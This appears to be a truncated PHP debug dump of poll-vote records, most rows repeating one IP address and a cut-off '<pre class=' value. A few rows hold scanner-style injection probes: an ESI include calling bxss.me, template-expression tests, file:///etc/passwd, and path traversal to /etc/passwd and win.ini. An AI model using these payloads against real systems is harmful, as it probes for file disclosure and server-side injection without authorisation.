(int) 2596 => array(
'id' => '3139',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2597 => array(
'id' => '3140',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2598 => array(
'id' => '3141',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2599 => array(
'id' => '3142',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2600 => array(
'id' => '3143',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2601 => array(
'id' => '3144',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2602 => array(
'id' => '3145',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2603 => array(
'id' => '3146',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2604 => array(
'id' => '3147',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2605 => array(
'id' => '3148',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2606 => array(
'id' => '3149',
'ip' => '45.137.76.29',
'ip1' => '<pre class=<esi:include src="http://bxss.me/rpb.png"/>',
'sondage_id' => '2'
),
(int) 2607 => array(
'id' => '3150',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2608 => array(
'id' => '3151',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2609 => array(
'id' => '3152',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2610 => array(
'id' => '3153',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2611 => array(
'id' => '3154',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2612 => array(
'id' => '3155',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2613 => array(
'id' => '3156',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2614 => array(
'id' => '3157',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2615 => array(
'id' => '3158',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2616 => array(
'id' => '3159',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2617 => array(
'id' => '3160',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2618 => array(
'id' => '3161',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2619 => array(
'id' => '3162',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2620 => array(
'id' => '3163',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2621 => array(
'id' => '3164',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2622 => array(
'id' => '3165',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2623 => array(
'id' => '3166',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2624 => array(
'id' => '3167',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2625 => array(
'id' => '3168',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2626 => array(
'id' => '3169',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2627 => array(
'id' => '3170',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2628 => array(
'id' => '3171',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2629 => array(
'id' => '3172',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2630 => array(
'id' => '3173',
'ip' => '45.137.76.29',
'ip1' => '',
'sondage_id' => '2'
),
(int) 2631 => array(
'id' => '3174',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2632 => array(
'id' => '3175',
'ip' => '${9999349+9999166}',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2633 => array(
'id' => '3176',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2634 => array(
'id' => '3177',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2635 => array(
'id' => '3178',
'ip' => '45.137.76.29',
'ip1' => '${9999998+10000110}',
'sondage_id' => '2'
),
(int) 2636 => array(
'id' => '3179',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2637 => array(
'id' => '3180',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2638 => array(
'id' => '3181',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2639 => array(
'id' => '3182',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2640 => array(
'id' => '3183',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2641 => array(
'id' => '3184',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2642 => array(
'id' => '3185',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2643 => array(
'id' => '3186',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2644 => array(
'id' => '3187',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2645 => array(
'id' => '3188',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2646 => array(
'id' => '3189',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2647 => array(
'id' => '3190',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2648 => array(
'id' => '3191',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2649 => array(
'id' => '3192',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2650 => array(
'id' => '3193',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2651 => array(
'id' => '3194',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2652 => array(
'id' => '3195',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2653 => array(
'id' => '3196',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2654 => array(
'id' => '3197',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2655 => array(
'id' => '3198',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2656 => array(
'id' => '3199',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2657 => array(
'id' => '3200',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2658 => array(
'id' => '3201',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2659 => array(
'id' => '3202',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2660 => array(
'id' => '3203',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2661 => array(
'id' => '3204',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2662 => array(
'id' => '3205',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2663 => array(
'id' => '3206',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2664 => array(
'id' => '3207',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2665 => array(
'id' => '3208',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2666 => array(
'id' => '3209',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2667 => array(
'id' => '3210',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2668 => array(
'id' => '3211',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2669 => array(
'id' => '3212',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2670 => array(
'id' => '3213',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2671 => array(
'id' => '3214',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2672 => array(
'id' => '3215',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2673 => array(
'id' => '3216',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2674 => array(
'id' => '3217',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2675 => array(
'id' => '3218',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2676 => array(
'id' => '3219',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2677 => array(
'id' => '3220',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2678 => array(
'id' => '3221',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2679 => array(
'id' => '3222',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2680 => array(
'id' => '3223',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2681 => array(
'id' => '3224',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2682 => array(
'id' => '3225',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2683 => array(
'id' => '3226',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2684 => array(
'id' => '3227',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2685 => array(
'id' => '3228',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2686 => array(
'id' => '3229',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2687 => array(
'id' => '3230',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2688 => array(
'id' => '3231',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2689 => array(
'id' => '3232',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2690 => array(
'id' => '3233',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2691 => array(
'id' => '3234',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2692 => array(
'id' => '3235',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2693 => array(
'id' => '3236',
'ip' => 'file:///etc/passwd',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2694 => array(
'id' => '3237',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2695 => array(
'id' => '3238',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2696 => array(
'id' => '3239',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2697 => array(
'id' => '3240',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2698 => array(
'id' => '3241',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2699 => array(
'id' => '3242',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2700 => array(
'id' => '3243',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2701 => array(
'id' => '3244',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2702 => array(
'id' => '3245',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2703 => array(
'id' => '3246',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2704 => array(
'id' => '3247',
'ip' => '../45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2705 => array(
'id' => '3248',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2706 => array(
'id' => '3249',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2707 => array(
'id' => '3250',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2708 => array(
'id' => '3251',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2709 => array(
'id' => '3252',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2710 => array(
'id' => '3253',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2711 => array(
'id' => '3254',
'ip' => '45.137.76.29',
'ip1' => '../../../../../../../../../../../../../../etc/passwd',
'sondage_id' => '2'
),
(int) 2712 => array(
'id' => '3255',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2713 => array(
'id' => '3256',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2714 => array(
'id' => '3257',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2715 => array(
'id' => '3258',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2716 => array(
'id' => '3259',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2717 => array(
'id' => '3260',
'ip' => '45.137.76.29',
'ip1' => '../../../../../../../../../../../../../../windows/win.ini',
'sondage_id' => '2'
),
(int) 2718 => array(
'id' => '3261',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2719 => array(
'id' => '3262',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2720 => array(
'id' => '3263',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2721 => array(
'id' => '3264',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2722 => array(
'id' => '3265',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2723 => array(
'id' => '3266',
'ip' => '45.137.76.29',
'ip1' => 'file:///etc/passwd',
'sondage_id' => '2'
),
(int) 2724 => array(
'id' => '3267',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2725 => array(
'id' => '3268',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2726 => array(
'id' => '3269',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2727 => array(
'id' => '3270',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2728 => array(
'id' => '3271',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2729 => array(
'id' => '3272',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2730 => array(
'id' => '3273',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2731 => array(
'id' => '3274',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2732 => array(
'id' => '3275',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2733 => array(
'id' => '3276',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2734 => array(
'id' => '3277',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2735 => array(
'id' => '3278',
'ip' => '45.137.76.29',
'ip1' => '../<pre class=',
'sondage_id' => '2'
),
(int) 2736 => array(
'id' => '3279',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2737 => array(
'id' => '3280',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2738 => array(
'id' => '3281',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2739 => array(
'id' => '3282',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2740 => array(
'id' => '3283',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2741 => array(
'id' => '3284',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2742 => array(
'id' => '3285',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2743 => array(
'id' => '3286',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2744 => array(
'id' => '3287',
'ip' => '45.137.76.29',
'ip1' => '<pre class=&n943279=v992483',
'sondage_id' => '2'
),
(int) 2745 => array(
'id' => '3288',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2746 => array(
'id' => '3289',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2747 => array(
'id' => '3290',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2748 => array(
'id' => '3291',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2749 => array(
'id' => '3292',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2750 => array(
'id' => '3293',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2751 => array(
'id' => '3294',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2752 => array(
'id' => '3295',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2753 => array(
'id' => '3296',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2754 => array(
'id' => '3297',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2755 => array(
'id' => '3298',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2756 => array(
'id' => '3299',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2757 => array(
'id' => '3300',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2758 => array(
'id' => '3301',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2759 => array(
'id' => '3302',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2760 => array(
'id' => '3303',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2761 => array(
'id' => '3304',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2762 => array(
'id' => '3305',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2763 => array(
'id' => '3306',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2764 => array(
'id' => '3307',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2765 => array(
'id' => '3308',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2766 => array(
'id' => '3309',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2767 => array(
'id' => '3310',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2768 => array(
'id' => '3311',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2769 => array(
'id' => '3312',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2770 => array(
'id' => '3313',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2771 => array(
'id' => '3314',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2772 => array(
'id' => '3315',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2773 => array(
'id' => '3316',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2774 => array(
'id' => '3317',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2775 => array(
'id' => '3318',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2776 => array(
'id' => '3319',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2777 => array(
'id' => '3320',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2778 => array(
'id' => '3321',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2779 => array(
'id' => '3322',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2780 => array(
'id' => '3323',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2781 => array(
'id' => '3324',
'ip' => ')',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2782 => array(
'id' => '3325',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2783 => array(
'id' => '3326',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2784 => array(
'id' => '3327',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2785 => array(
'id' => '3328',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2786 => array(
'id' => '3329',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2787 => array(
'id' => '3330',
'ip' => '!(()&&!|*|*|',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2788 => array(
'id' => '3331',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2789 => array(
'id' => '3332',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2790 => array(
'id' => '3333',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2791 => array(
'id' => '3334',
'ip' => '^(#$!@#$)(()))******',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2792 => array(
'id' => '3335',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2793 => array(
'id' => '3336',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2794 => array(
'id' => '3337',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2795 => array(
'id' => '3338',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2796 => array(
'id' => '3339',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2797 => array(
'id' => '3340',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2798 => array(
'id' => '3341',
'ip' => '45.137.76.29',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 2799 => array(
'id' => '3342',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2800 => array(
'id' => '3343',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2801 => array(
'id' => '3344',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2802 => array(
'id' => '3345',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2803 => array(
'id' => '3346',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2804 => array(
'id' => '3347',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2805 => array(
'id' => '3348',
'ip' => '45.137.76.29',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 2806 => array(
'id' => '3349',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2807 => array(
'id' => '3350',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2808 => array(
'id' => '3351',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2809 => array(
'id' => '3352',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2810 => array(
'id' => '3353',
'ip' => '45.137.76.29',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 2811 => array(
'id' => '3354',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2812 => array(
'id' => '3355',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2813 => array(
'id' => '3356',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2814 => array(
'id' => '3357',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2815 => array(
'id' => '3358',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2816 => array(
'id' => '3359',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2817 => array(
'id' => '3360',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2818 => array(
'id' => '3361',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2819 => array(
'id' => '3362',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2820 => array(
'id' => '3363',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2821 => array(
'id' => '3364',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2822 => array(
'id' => '3365',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2823 => array(
'id' => '3366',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2824 => array(
'id' => '3367',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2825 => array(
'id' => '3368',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2826 => array(
'id' => '3369',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2827 => array(
'id' => '3370',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2828 => array(
'id' => '3371',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2829 => array(
'id' => '3372',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2830 => array(
'id' => '3373',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2831 => array(
'id' => '3374',
'ip' => '45.137.76.29',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2832 => array(
'id' => '3375',
'ip' => '45.137.76.29',
